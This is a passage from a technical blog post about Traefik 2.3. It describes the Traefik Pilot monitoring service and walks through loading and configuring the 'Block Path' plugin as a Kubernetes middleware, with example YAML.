loading="lazy" width="1600" height="900"></figure><p>This service is called Traefik Pilot. It is for the moment very basic: it simply tracks the healthcheck of your Traefik instance, and can send you a notification if it stops answering. It is available at the URL <a href="https://pilot.traefik.io/?ref=en.tferdinand.net">https://pilot.traefik.io/</a></p><p>After a quick registration, it is possible to register a Traefik instance.</p><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/07/image-15.png" class="kg-image" alt="Traefik 2.3 : Towards plugins and beyond!" loading="lazy" width="667" height="776"><figcaption>Fake token, you can always copy it ;)</figcaption></figure><!--kg-card-begin: html--><div style="background:orange; padding:10px;"><h4>Beware of the token</h4><br>
Contrary to what is indicated on the site, you must copy the token without the quotes around it, otherwise you will get a message telling you that the token is invalid! This bug has been reported to Containous, who, I have no doubt, will fix it quickly!</div><!--kg-card-end: html--><p>So I added the command-line parameter to the Traefik startup line on Kubernetes.</p><p>After a restart, you should see your status change to OK.</p><figure class="kg-card kg-image-card"><img src="https://tferdinand.net/content/images/2020/07/image-16.png" class="kg-image" alt="Traefik 2.3 : Towards plugins and beyond!" loading="lazy" width="426" height="327"></figure><p>However, there are a few things to keep in mind:</p><ul><li>This status currently only reflects the status of your Traefik container, and does not mean that the backends are functional.</li><li>This healthcheck is sent from your instance, in &quot;heartbeat&quot; mode, and does not necessarily mean that your server is reachable.</li><li>Since the signal is sent as a heartbeat, it is also possible to monitor instances that sit in a private application zone.</li></ul><p>It is then possible, by clicking on your name at the top right, to define alarms, via webhooks or by e-mail.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/07/image-17.png" class="kg-image" alt="Traefik 2.3 : Towards plugins and beyond!" loading="lazy" width="1026" height="651"></figure><p>Note that it is possible to indicate that you wish to receive security alarms, linked to the discovery of possible CVEs affecting your version of Traefik.</p><h2 id="warm-up-the-plugins">Warm up the plugins</h2><p>For many years I used the very popular Apache httpd. One of the enormous strengths of this product is undoubtedly its modularity, allowing the community to extend its functionality.</p><p>Traefik now allows the use of plugins as well.
The list is currently rather small, but I have no doubt that the catalog will grow quickly!</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/07/image-19.png" class="kg-image" alt="Traefik 2.3 : Towards plugins and beyond!" loading="lazy" width="1013" height="713"></figure><p>Plugins are written in Go, and it is possible to contribute by following <a href="https://github.com/containous/plugindemo?ref=en.tferdinand.net">the guide provided by Containous</a>.</p><p>For the purpose of this article, I chose the &quot;Block Path&quot; plugin published by Containous. This plugin dynamically blocks access to certain pages based on regular expressions.</p><p>Blocked pages directly return a 403 (Forbidden) error.</p><p>The benefit of this kind of plugin, which already exists in most reverse proxies, is the ability to intercept access to certain pages, and thus prevent the backend from receiving any hit.</p><p>This makes it possible:</p><ul><li>Not to generate load (for example on an admin page that could be brute-forced or DDoSed).</li><li>To avoid exposing an undiscovered zero-day flaw, since the backend does not receive any requests.</li></ul><h3 id="charger-le-plugin">Loading the plugin</h3><p>The loading of the plugin is done via <a href="https://docs.traefik.io/v1.7/basics/?ref=en.tferdinand.net#static-traefik-configuration">the static configuration</a> of Traefik. For my part, I loaded it via the command-line parameters, since this is how I chose to load my entire configuration.</p><!--kg-card-begin: html--><pre class="language-yaml line-numbers"><code>       args:
       - --providers.kubernetescrd
       - --accesslog=true
       - --accesslog.filepath=/var/log/traefik/access.log
       - --accesslog.fields.headers.defaultmode=keep
       - --entrypoints.web.address=:80
       - --entrypoints.websecure.address=:443
       - --certificatesresolvers.le.acme.email=myawesomemail@mail.com
       - --certificatesresolvers.le.acme.storage=/cert/acme.json
       - --certificatesResolvers.le.acme.httpChallenge.entryPoint=web
       - --experimental.pilot.token=mytoken
       - --experimental.plugins.demo.moduleName=github.com/containous/plugin-blockpath
       - --experimental.plugins.demo.version=v0.1.2
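       # Illustrative equivalent (not in the original manifest): the Pilot and
       # plugin settings above could also live in Traefik's static configuration
       # file (traefik.yml) instead of the command line, e.g.:
       #   experimental:
       #     pilot:
       #       token: mytoken
       #     plugins:
       #       demo:
       #         moduleName: github.com/containous/plugin-blockpath
       #         version: v0.1.2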
</code></pre><!--kg-card-end: html--><p>You can see on lines 12 and 13 the loading of the plugin.</p><p>In my command line, &quot;demo&quot; is the name I gave to the plugin (used just after). moduleName thus contains the path to the GitHub repository containing the plugin, and version is the Git version to check out.</p><p>Once this configuration is done, it is necessary to restart Traefik.</p><h3 id="configuring-the-plugin">Configuring the plugin</h3><p>The plugin then behaves like a classic middleware. If you remember my previous articles, middlewares are components that plug in between Traefik and your backend, and can alter the normal behavior. For example, on this page, a middleware defines the necessary security headers.</p><p>For example, I have declared a new middleware in my Kubernetes cluster:</p><!--kg-card-begin: html--><pre class="language-yaml line-numbers"><code>apiVersion: traefik.containo.us/v1alpha1
kind: Middleware
metadata:
  name: demo
spec:
  plugin:
    demo:
      regex: [&quot;^/demo-[a-z]{1,5}&quot;]
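      # Illustrative behavior (not part of the original manifest):
      #   GET /demo-abc -> matches ^/demo-[a-z]{1,5}, Traefik returns 403 directly
      #   GET /blog     -> no match, the request reaches the backend as usual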
</code></pre><!--kg-card-end: html--><p>So, as usual, we find:</p><ul><li>Line 4: The name of my middleware, which can be different from the name I gave to my plugin.</li><li>Line 6: I tell Traefik that this middleware is a plugin.</li><li>Line 7: I indicate the name I gave to my plugin when I loaded it.</li><li>Line 8 and following, if needed: I indicate the configuration of my middleware.</li></ul><p>In my example, I chose to block any access whose path starts with &quot;/demo-&quot; followed by 1 to 5 lowercase letters.</p><h3 id="load-middleware">Load middleware</h3><p>Now that I have defined my middleware, I have to load it into my IngressRoute.</p><p>So I modify my IngressRoute to load this middleware as well. As a reminder, you can define multiple middlewares on your IngressRoutes, which will be executed in sequence.</p><!--kg-card-begin: html--><pre class="language-yaml line-numbers"><code>
apiVersion: traefik.containo.us/v1alpha1
kind: IngressRoute
metadata:
  name: traefik-web-ui-tls
  namespace: default
spec:
  entryPoints:
    - websecure
  routes:
  - kind: Rule
    priority: 1
    match: (Host(`www.tferdinand.net`) || Host(`tferdinand.net`)) &amp;&amp; PathPrefix(`/`)
    services:
    - name: ghost-tfe-fr
      port: 2368
      healthCheck:
        path: /
        host: tferdinand.net
        intervalSeconds: 10
        timeoutSeconds: 5
    middlewares:
      - name: security
      - name: demo
  tls:
    certResolver: le
    options:
      name: mytlsoption
      namespace: default
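  # Illustrative note (not part of the original manifest): middlewares run in
  # declaration order, so a request goes through security (adds the security
  # headers), then demo (may return 403), before reaching the ghost-tfe-fr service.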
</code></pre><!--kg-card-end: html--><p>You can see the load on line 23, which will be executed after adding the security headers.</p><h3 id="let-s-test-the-plugin">Let&apos;s test the plugin</h3><p>Now it&apos;s time to test my plugin.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/07/image-20.png" class="kg-image" alt="Traefik 2.3 : Towards plugins and beyond!" loading="lazy" width="567" height="280"><figcaption>Yes, I also use Windows, and I own it ;)</figcaption></figure><p>You can see that it has the expected behavior: my normal accesses work as before, while accesses matching the pattern I defined are blocked directly by Traefik.</p><h2 id="in-conclusion-a-small-step-for-containous-a-big-step-for-the-community-">In conclusion: A small step for Containous, a big step for the community.</h2><p>Adding plugins and Traefik Pilot are clearly previews at the moment, and don&apos;t yet reveal their full potential; however, this open modularity will allow the community to extend the basic features without making the Traefik core heavy.</p><p>It also allows companies to potentially develop their own private plugins and thus adapt Traefik to their needs.</p><p>Pilot is an excellent initiative, and I can&apos;t wait to see how Containous will turn this trial into a top feature!</p>]]></content:encoded></item></channel></rss>